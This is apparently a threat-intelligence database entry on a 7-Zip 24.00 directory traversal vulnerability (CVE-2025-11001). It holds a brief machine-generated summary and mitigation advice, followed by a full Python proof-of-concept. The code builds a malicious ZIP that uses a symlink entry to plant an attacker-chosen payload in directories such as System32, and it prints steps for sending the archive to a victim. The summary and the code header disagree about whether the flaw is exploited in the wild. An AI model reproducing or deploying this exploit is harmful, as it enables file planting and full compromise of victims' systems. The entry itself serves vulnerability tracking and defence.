7-Zip 24.00 - Directory Traversal
AI-Powered Analysis (machine-generated threat intelligence)
Technical Summary
The 7-Zip 24.00 application contains a directory traversal vulnerability that can be exploited locally to write files outside the target extraction directory. This can lead to overwriting or placing files in arbitrary locations on the filesystem. Exploit code written in Python is publicly available, so a proof of concept exists. No affected versions list or patch information is provided, and there is no indication of known exploits in the wild.
Potential Impact
Successful exploitation could allow an attacker with local access to write files to arbitrary locations on the system, potentially leading to privilege escalation or system compromise depending on the context and file locations targeted.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, avoid extracting untrusted archives with 7-Zip 24.00 or use alternative extraction tools that are not vulnerable.
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions

import struct
import os
import argparse
import sys


def build_zip(target_path, payload_file, output_zip):
    if not os.path.isfile(payload_file):
        print(f"[-] Payload file not found: {payload_file}")
        sys.exit(1)

    payload_name = os.path.basename(payload_file)
    payload_data = open(payload_file, "rb").read()

    target = target_path.replace("\\", "/").strip("/") + "/"
    traversal = "../../../../" + target

    with open(output_zip, "wb") as f:
        offset = 0

        symlink_name = "evil.lnk"
        symlink_target = traversal.encode() + b"\x00"
        symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
        symlink_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0x800,
                                     0, 0, 0, 0, 0, 0,
                                     len(symlink_name), len(symlink_extra))
        f.write(symlink_header)
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(b"")
        symlink_central_offset = offset
        offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)

        payload_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0,
                                     0, 0, 0, 0,
                                     len(payload_data), len(payload_data),
                                     len(payload_name), 0)
        f.write(payload_header)
        f.write(payload_name.encode())
        f.write(payload_data)
        payload_central_offset = offset
        offset += len(payload_header) + len(payload_name) + len(payload_data)

        cd_offset = offset
        f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800,
                            0, 0, 0, 0, 0, 0,
                            len(symlink_name), len(symlink_extra),
                            0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800,
                            0, 0, 0, 0,
                            len(payload_data), len(payload_data),
                            len(payload_name), 0,
                            0, 0, 0, 0o777 << 16, payload_central_offset))
        f.write(payload_name.encode())

        f.write(struct.pack("<IHHHHIIH", 0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))

    print(f"[+] Malicious archive created: {output_zip}")
    print(f"[+] Target path : {target_path}")
    print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)")
    print(f"[+] Final write location : {target_path}\\{payload_name}")
    print("\n[*] Usage:")
    print(" 1. Send the ZIP file to the victim")
    print(" 2. Victim must run 7-Zip < 25.00 as Administrator")
    print(" 3. Victim opens and extracts the ZIP → payload dropped silently")
    print(" 4. Achievement unlocked")


if __name__ == "__main__":
    banner = """
    CVE-2025-11001 - 7-Zip Directory Traversal PoC
    Author: Mohammed Idrees Banyamer (@banyamer_security)
    """
    print(banner)

    parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
    parser.add_argument("-t", "--target", required=True,
                        help="Target directory (e.g. C:\\Windows\\System32)")
    parser.add_argument("-p", "--payload", required=True,
                        help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
    parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip",
                        help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
    args = parser.parse_args()

    build_zip(args.target, args.payload, args.output)
```
Technical Details
- EDB-ID: 52501
- Has exploit code: true
- Code language: Python
Threat ID: 69d842c21cc7ad14da3f5b24
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/10/2026, 12:22:57 AM
Last updated: 4/10/2026, 8:31:03 AM